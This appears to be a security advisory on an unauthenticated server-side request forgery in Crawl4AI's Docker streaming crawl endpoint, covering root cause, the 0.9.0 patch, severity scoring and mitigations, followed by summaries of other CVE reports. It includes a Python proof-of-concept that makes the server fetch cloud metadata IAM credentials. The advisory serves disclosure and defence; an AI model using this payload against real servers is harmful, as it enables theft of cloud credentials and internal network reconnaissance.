The root cause of the vulnerability lies in the structural discrepancy between the streaming and non-streaming request handlers inside the deploy/docker/api.py router. While standard crawler operations route through an input normalization routine that calls validate_url_destination(), the streaming engine does not.

In the vulnerable implementation of deploy/docker/api.py, requests sent directly to /crawl/stream maps to handle_stream_crawl_request(). Similarly, requests sent to /crawl with crawler_config.stream=true are diverted straight to the same streaming handler. The design of handle_stream_crawl_request() processed the raw seed URLs directly, bypassing validation.

This validation gap persisted due to regression testing shortcomings. The existing test suite verified the generic existence of SSRF filtering in some handlers but did not validate coverage across every independent path. Consequently, the streaming controller remained completely exposed to malicious user inputs.

# Introduced in v0.9.0 inside deploy/docker/api.py def _normalize_and_validate_seeds(urls: List[str]) -> List[str]: """Prefix bare hosts with https:// and SSRF-validate every seed URL's destination. Shared by the streaming and non-streaming crawl handlers.""" urls = [('https://' + url) if not url.startswith(('http://', 'https://')) and not url.startswith(('raw:', 'raw://')) else url for url in urls] for url in urls: validate_url_destination(url) return urls

async def handle_stream_crawl_request( urls: List[str], browser_config: dict, crawler_config: dict, config: dict, hooks_config: Optional[dict] = None ) -> Tuple[AsyncWebCrawler, AsyncGenerator, Optional[Dict]]: """Handle streaming crawl requests with optional hooks.""" hooks_info = None crawler = None try: # Enforce SSRF validation for streaming sessions urls = _normalize_and_validate_seeds(urls) # Remaining streaming process continues safely...

import requests target_url = 'http://target-crawl4ai-server:11235/crawl/stream' payload = { 'urls': ['http://169.254.169.254/latest/meta-data/iam/security-credentials/'], 'browser_config': {}, 'crawler_config': {} } response = requests.post(target_url, json=payload, stream=True) for line in response.iter_lines(): if line: print(line.decode('utf-8'))

Product

Affected Versions

Fixed Version

crawl4ai

Unclecode

< 0.9.0

0.9.0

Attribute

Detail

CWE ID

CWE-918

Attack Vector

Network (AV:N)

Attack Complexity

Low (AC:L)

Privileges Required

None (PR:N)

CVSS Score

8.6 (High)

Exploit Status

Proof-of-Concept (PoC)

CISA KEV Status

Not Listed

GHSA-WM69-2PC3-RMMF

GHSA-wm69-2pc3-rmmf: Unauthenticated Server-Side Request Forgery in Crawl4AI Docker Streaming Crawl Path

Amit Schendel

Senior Security Researcher

Jun 18, 2026·5 min read·26 visits

Executive Summary (TL;DR)

A bypass of SSRF validation on the streaming crawl endpoints in Crawl4AI Docker deployments allows unauthenticated remote attackers to query internal network services and cloud metadata endpoints.

An unauthenticated Server-Side Request Forgery (SSRF) vulnerability was identified in the Crawl4AI Docker API server before version 0.9.0. The vulnerability exists because the streaming crawl endpoint (/crawl/stream) and the standard crawl endpoint with streaming enabled (/crawl with crawler_config.stream=true) bypass the validate_url_destination security filter. This allows remote, unauthenticated attackers to execute arbitrary HTTP requests targeting internal infrastructure, loopback interfaces, or cloud metadata endpoints like AWS/GCP services.

Attack Flow Diagram

Vulnerability Overview

Crawl4AI is an open-source, LLM-friendly web crawler and scraper designed to convert web pages into structured text formats. To facilitate multi-user deployments, the project provides a containerized FastAPI application. The Docker server exposes endpoints that accept scraping requests, allowing remote consumers to execute crawl tasks on target URLs.

The attack surface of the Crawl4AI Docker container is unauthenticated by default. This public exposure necessitates strict validation controls to prevent attackers from using the crawler as a proxy. If a user-supplied target URL is not constrained, the backend crawler can be abused to perform network queries targeting unauthorized locations.

This security posture is compromised when handling streaming crawl operations. Specifically, the POST /crawl/stream endpoint and streaming-configured calls to POST /crawl bypass the internal validation engine. This bypass results in an unauthenticated Server-Side Request Forgery (SSRF) vulnerability. The flaw allows remote attackers to probe internal networks and cloud infrastructure.

Root Cause Analysis

Code Analysis

To illustrate the structural omission, we compare the original logic with the patch implemented in version 0.9.0. In the patched state, the development team introduced _normalize_and_validate_seeds() to centralize input filtering and prevent code execution drift across multiple API handlers.

Below is the unified validation wrapper introduced in the patched code. This function ensures that every URL is normalized and subjected to validate_url_destination() before any networking context is initialized:

# Introduced in v0.9.0 inside deploy/docker/api.py
def _normalize_and_validate_seeds(urls: List[str]) -> List[str]:
    """Prefix bare hosts with https:// and SSRF-validate every seed URL's
    destination. Shared by the streaming and non-streaming crawl handlers."""
    urls = [('https://' + url) if not url.startswith(('http://', 'https://')) and not url.startswith(('raw:', 'raw://')) else url for url in urls]
    for url in urls:
        validate_url_destination(url)
    return urls

In the patched version of handle_stream_crawl_request(), the validation is called immediately upon receiving the parameter inputs. This enforces the exact security boundary already established in the standard crawl endpoint:

async def handle_stream_crawl_request(
    urls: List[str],
    browser_config: dict,
    crawler_config: dict,
    config: dict,
    hooks_config: Optional[dict] = None
) -> Tuple[AsyncWebCrawler, AsyncGenerator, Optional[Dict]]:
    """Handle streaming crawl requests with optional hooks."""
    hooks_info = None
    crawler = None
    try:
        # Enforce SSRF validation for streaming sessions
        urls = _normalize_and_validate_seeds(urls)
        # Remaining streaming process continues safely...

Crucially, the SSRF engine (deploy/docker/utils.py) defines blocklists for common internal network ranges. This includes IPv4 private blocks (RFC 1918), local link-local segments (169.254.0.0/16), and standard internal hostnames such as metadata.google.internal and kubernetes.default. Applying _normalize_and_validate_seeds stops the attack because the egress broker resolves DNS queries and rejects blocked IP configurations.

Exploitation & Attack Flow

Exploitation requires no authentication or special application states. An attacker can execute the attack by sending a JSON payload directly to the /crawl/stream endpoint on an exposed server. This makes the target host fetch and return restricted local resources.

The attack flow is illustrated in the diagram below, showing how the bypass circumvents validation to access internal assets:

Below is a practical Python proof-of-concept script illustrating the exploitation technique against an unprotected target. The script triggers the streaming endpoint to crawl the cloud instance metadata service:

import requests
 
target_url = 'http://target-crawl4ai-server:11235/crawl/stream'
payload = {
    'urls': ['http://169.254.169.254/latest/meta-data/iam/security-credentials/'],
    'browser_config': {},
    'crawler_config': {}
}
 
response = requests.post(target_url, json=payload, stream=True)
for line in response.iter_lines():
    if line:
        print(line.decode('utf-8'))

Impact Assessment

The security impact of this vulnerability is classified as High (CVSS 8.6). Because the server acts as an open proxy to access internal domains, the attack scope is changed (S:C). This allows the attacker to cross security boundaries and read data from isolated environments.

A successful exploit compromises confidentiality on a systemic level (C:H). In cloud environments (such as AWS, GCP, or Azure), the metadata server exposes temporary IAM credentials, service tokens, and instance metadata. Attackers can leverage these credentials to compromise broader cloud infrastructure.

Furthermore, attackers can use the unauthenticated container as an internal port scanner. By parsing the response times and HTTP responses from streaming requests, attackers can map out the internal topology. This identifies adjacent microservices, databases, and configuration consoles that are not exposed to the public internet.

Remediation & Mitigation

Remediation requires upgrading the crawl4ai installation to version 0.9.0 or higher. This version integrates the _normalize_and_validate_seeds() wrapper across all streaming handlers. This blocks the bypass path permanently.

If upgrading is delayed, organizations should restrict container egress traffic. Implement network policies using egress firewalls to prevent the Docker container from initiating outbound connections to RFC 1918 networks (10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16) and the link-local range (169.254.0.0/16).

Additionally, avoid exposing the Crawl4AI Docker server directly to the public internet without an authentication layer. Placing the container behind a reverse proxy, API gateway, or VPN that enforces token-based authorization mitigates the risk of direct exposure.

Technical Appendix

CVSS Score

8.6/ 10

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N

Affected Systems

Crawl4AI Docker API Server

Affected Versions Detail

Product	Affected Versions	Fixed Version
crawl4ai Unclecode	< 0.9.0	0.9.0

Attribute	Detail
CWE ID	CWE-918
Attack Vector	Network (AV:N)
Attack Complexity	Low (AC:L)
Privileges Required	None (PR:N)
CVSS Score	8.6 (High)
Exploit Status	Proof-of-Concept (PoC)
CISA KEV Status	Not Listed

MITRE ATT&CK Mapping

T1190Exploit Public-Facing Application

Initial Access

T1552.005Unsecured Credentials: Cloud Metadata Service

Credential Access

T1046Network Service Discovery

Discovery

T1090Proxy

Command and Control

CWE-918

Server-Side Request Forgery (SSRF)

The web application server-side engine receives an untrusted URL, resolves it, and fetches resource without verifying whether the host is within a restricted network boundary.

Known Exploits & Detection

GitHub AdvisoryVulnerability report highlighting the SSRF validation gap in handle_stream_crawl_request.

Vulnerability Timeline

Security advisory GHSA-wm69-2pc3-rmmf published.

2026-06-18

Crawl4AI version 0.9.0 published containing official SSRF verification fix.

2026-06-18

More Reports

•1 day ago•CVE-2026-58263

7.2

CVE-2026-58263: Mutation Cross-Site Scripting (mXSS) in Jodit Editor clean-html Sanitizer

CVE-2026-58263 is a high-severity Mutation Cross-Site Scripting (mXSS) vulnerability affecting Jodit Editor prior to version 4.12.28. The flaw exists in Jodit's built-in clean-html sanitizer plugin, which fails to securely parse and sanitize nested elements containing foreign namespaces like MathML and SVG. Attackers can bypass sanitization by smuggling malicious payload elements inside rawtext container tags like style inside a MathML node, leading to DOM mutation and unauthenticated arbitrary script execution in the context of the user's browser session.

Amit Schendel

6 views•6 min read

•1 day ago•CVE-2026-65841

5.3

CVE-2026-65841: Client-Side Cross-Site Scripting (XSS) via Foreign Namespace Sanitization Bypass in Jodit Editor

Jodit Editor versions prior to 4.13.6 are vulnerable to client-side Cross-Site Scripting (XSS). The clean-html plugin's sanitization routine performs case-sensitive lookups against uppercase-only element blacklists. When processing XML-based foreign namespaces such as SVG or MathML, DOM engines preserve the lowercase format of tags. Because Jodit's denyTags check fails to normalize tag casing, malicious script blocks nested inside foreign namespace elements completely bypass validation and serialize directly into the editor output.

Amit Schendel

6 views•6 min read

•1 day ago•CVE-2026-53510

8.1

CVE-2026-53510: Remote Code Execution via Dynamic WSDL Parsing in Savon Ruby SOAP Client

A critical code injection vulnerability exists in Savon, a widely used SOAP client library for Ruby, prior to version 2.17.2. The vulnerability resides within the Savon::Model.all_operations module, where operation names fetched from a target Web Services Description Language (WSDL) document are dynamically evaluated via module_eval without sanitization. An attacker capable of manipulating the target WSDL document (e.g., through Man-in-the-Middle attacks, DNS hijacking, or Server-Side Request Forgery) can execute arbitrary Ruby code in the context of the parent application process.

Alon Barad

11 views•6 min read

•1 day ago•CVE-2026-53466

6.5

CVE-2026-53466: Integer Conversion Overflow in ImageMagick XCF Decoder

An integer conversion overflow vulnerability exists in the XCF decoder of ImageMagick before version 6.9.13-51 and 7.1.2-26. The issue arises from mixed-type arithmetic that promotes calculation results to floating-point representations, causing an undefined cast back to integer. Under optimizing compilers, this undefined behavior results in bounds checks being bypassed, allowing out-of-bounds heap reads.

Amit Schendel

6 views•6 min read

•1 day ago•CVE-2026-53599

7.5

CVE-2026-53599: Authenticated Remote Code Execution in REDAXO CMS via Mediapool File Upload Validation Bypass

An authenticated file upload validation bypass vulnerability exists in the REDAXO CMS Mediapool addon in versions 5.18.2 through 5.21.0. Under permissive web server configurations, this allows authenticated users with media upload privileges to achieve remote code execution via multi-segment extension file uploads.

Alon Barad

9 views•7 min read

•1 day ago•CVE-2026-52887

10.0

CVE-2026-52887: Critical SQL Injection and Remote Code Execution in NocoBase

A critical SQL injection vulnerability exists in the @nocobase/plugin-notification-in-app-message plugin of NocoBase prior to version 2.0.61. The flaw is caused by direct string interpolation of user-controlled input into a Sequelize.literal() query, allowing authenticated users to execute stacked PostgreSQL queries and achieve remote code execution on the underlying database server.

Amit Schendel

10 views•7 min read